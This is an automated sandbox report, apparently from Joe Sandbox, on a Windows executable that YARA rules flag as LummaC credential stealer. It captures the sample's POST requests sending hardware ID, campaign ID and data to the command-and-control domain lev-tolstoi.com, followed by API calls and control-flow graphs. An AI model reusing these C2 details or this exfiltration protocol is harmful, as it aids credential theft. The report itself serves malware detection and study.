Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CI%2FyoDxKwwBrT0%2Bh8dQw6j39QffpJcxnaToER6HHjVrNnr8ODlEToU%2BPoQvvwnAWpBn%2FYY5MbGJCny13vQQJj4W2Cm3ftpabFOu9D5DqfOP7XUlD07mXWKPBaokYkVYgxE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9063658d636a4e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1633&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1745367&cwnd=202&unsent_bytes=0&cid=0b6540e8b8f14864&ts=789&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:25 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ZHXDL6PTAB9YT3TQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12829
Host: lev-tolstoi.com
2024-12-28 09:05:25 UTC | 12829 | OUT | Data Raw: 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 5a 48 58 44 4c 36 50
Data Ascii: --ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="pid"2--ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="lid"4h5VfH----ZHXDL6P
2024-12-28 09:05:25 UTC | 1136 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:05:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=692r9r4h1rqdbr18oh24braqtm; expires=Wed, 23 Apr 2025 02:52:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAl0QoVlQ10Y57d5Q9zzoZ4HqVzw5Q17fAQtKpSY6B5Ql8P%2BozikUzc%2BsTPBtrWlHk%2FCJpDEuTSh2NqAwoC1gB3Ir%2BNdet6%2Fc5X%2F8n576%2BvsJ38bdgM9L%2BJncvokET57I44%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f9063748a8cf5f8-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1705&rtt_var=648&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13766&delivery_rate=1712609&cwnd=57&unsent_bytes=0&cid=f2516480e43dcd9e&ts=912&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49710 | 172.67.157.254 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:27 UTC | 271 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=NMJDNFT3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15010
Host: lev-tolstoi.com
2024-12-28 09:05:27 UTC | 15010 | OUT | Data Raw: 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
Data Ascii: --NMJDNFT3Content-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--NMJDNFT3Content-Disposition: form-data; name="pid"2--NMJDNFT3Content-Disposition: form-data; name="lid"4h5VfH----NMJDNFT3Content-Disposition:
2024-12-28 09:05:28 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:05:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=uo27dekk7u4rnll8gu8n0elt6b; expires=Wed, 23 Apr 2025 02:52:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXnfCw%2B%2F4B6BrHEn3Yfk9dTwY6DjIC61VaxIN1namCq774DK8UcRBDzlAwFId7UXjJ5GFkChMQfH2Yy0G9fyuAv3y%2B4a7dK%2FgI0beEpgzbTmsyUVO7FiSlsYTETf1QeLhyE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f906382aa5bc33f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1620&rtt_var=622&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15939&delivery_rate=1740166&cwnd=235&unsent_bytes=0&cid=c7837f9f9d86d57a&ts=863&x=0"
2024-12-28 09:05:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 09:05:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:29 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=U5FRMBJPQ6LUHBEW3E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20237
Host: lev-tolstoi.com
2024-12-28 09:05:29 UTC | 15331 | OUT | Data Raw: 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 55
Data Ascii: --U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="pid"3--U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="lid"4h5VfH----U
2024-12-28 09:05:29 UTC | 4906 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2024-12-28 09:05:30 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:05:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=db60gpqtfbbetdm6b4l0tcqm7v; expires=Wed, 23 Apr 2025 02:52:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8mG9wESCdEsAzJ9turZcgdCHQ5lwzyNoeWZ%2FR8K0gtVh8U%2F87bVMnTyOwFE6f%2FRFM6sABXhz%2B9MtcYanDaAq2MrONVUUcc9vv14ILy%2F9ZmLmnTJAjSIK0DWagv%2FIQrVRjk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f90639358167292-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1943&rtt_var=747&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21198&delivery_rate=1447694&cwnd=252&unsent_bytes=0&cid=46cb83214ceeec6a&ts=946&x=0"
2024-12-28 09:05:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 09:05:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID:0
Start time:04:05:11
Start date:28/12/2024
Path:C:\Users\user\Desktop\MPgkx6bQIQ.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\MPgkx6bQIQ.exe"
Imagebase:0x400000
File size:375'296 bytes
MD5 hash:1663E17268AE9D60DD70AE27B8EA43AB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:5
Start time:04:05:30
Start date:28/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
Imagebase:0xd70000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.7%
Dynamic/Decrypted Code Coverage:19%
Signature Coverage:62.6%
Total number of Nodes:147
Total number of Limit Nodes:12

Control-flow Graph

• Executed
• Not Executed
APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2573436264-4124187736
• Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
• Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                                          • Opcode ID: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Control-flow Graph
• Function start: 4210e0; subroutine calls: 43c9a0, 414040, 438e30, 43a9b0, 438e70, 4218a0, 407f60, 413c70, 407f70 (graph rendering and Executed / Not Executed block colouring omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,$T$U$V$h
• API String ID: 0-1072848446
• Opcode ID: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
• Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
• Opcode Fuzzy Hash: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
• Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B

Control-flow Graph
• Function start: 40cff3; subroutine calls: 408660, 4361e0, 40ba00 (graph rendering and Executed / Not Executed block colouring omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7605F6E83C1F4941F9F1B7136A1E0C5E$BI$ZG$lev-tolstoi.com$3ej$pr
• API String ID: 0-2650674121
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Control-flow Graph
• Function start: 408790; subroutine calls: 43a360, 4336c0, 43a930, 409bc0, 40cb90, 40b9d0; imported APIs reached: GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow, ExitProcess (graph rendering and Executed / Not Executed block colouring omitted)
APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
• ExitProcess.KERNEL32 ref: 00408972
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 3676751680-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Control-flow Graph
• Function start: 41bea0; subroutine calls: 41c690, 414070, 407f70, 407f60, 420df0 (graph rendering and Executed / Not Executed block colouring omitted)
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                                          • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                                          • Opcode ID: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                                                                                                                                                                                                                                                          • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 702 8ea28e-8ea2a7 703 8ea2a9-8ea2ab 702->703 704 8ea2ad 703->704 705 8ea2b2-8ea2be CreateToolhelp32Snapshot 703->705 704->705 706 8ea2ce-8ea2db Module32First 705->706 707 8ea2c0-8ea2c6 705->707 708 8ea2dd-8ea2de call 8e9f4d 706->708 709 8ea2e4-8ea2ec 706->709 707->706 712 8ea2c8-8ea2cc 707->712 713 8ea2e3 708->713 712->703 712->706 713->709
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008EA2B6
• Module32First.KERNEL32(00000000,00000224), ref: 008EA2D6
Memory Dump Source
• Source File: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e9000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 446f05686b06b366b5dc5742394b3759a2e45eff39792ad976531dd9c98e486f
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 80F062316007547BD7243ABA988DA6A76E8FF4AB24F100529F646E10C0DA71FC454A62

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 718 43cb20-43cb34 719 43cb40-43cb49 718->719 719->719 720 43cb4b-43cb5f 719->720 721 43cb61-43cb66 720->721 722 43cb68 720->722 723 43cb6f-43cb96 call 407f60 721->723 722->723 726 43cbb1-43cc1f 723->726 727 43cb98-43cb9b 723->727 728 43cc20-43cc34 726->728 729 43cba0-43cbaf 727->729 728->728 730 43cc36-43cc42 728->730 729->726 729->729 731 43cc44-43cc4f 730->731 732 43cc89-43cc97 call 407f70 730->732 733 43cc50-43cc57 731->733 740 43cc99-43cc9d 732->740 741 43cc9f-43cca8 732->741 735 43cc60-43cc66 733->735 736 43cc59-43cc5c 733->736 735->732 739 43cc68-43cc7d call 43a9b0 735->739 736->733 738 43cc5e 736->738 738->732 743 43cc82-43cc87 739->743 740->741 743->732
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: @$ihgf
• API String ID: 2994545307-73152791
• Opcode ID: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
• Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
• Opcode Fuzzy Hash: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
• Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: h d"
• API String ID: 0-862628183
• Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
• Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
• Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
• Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18
APIs
• LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
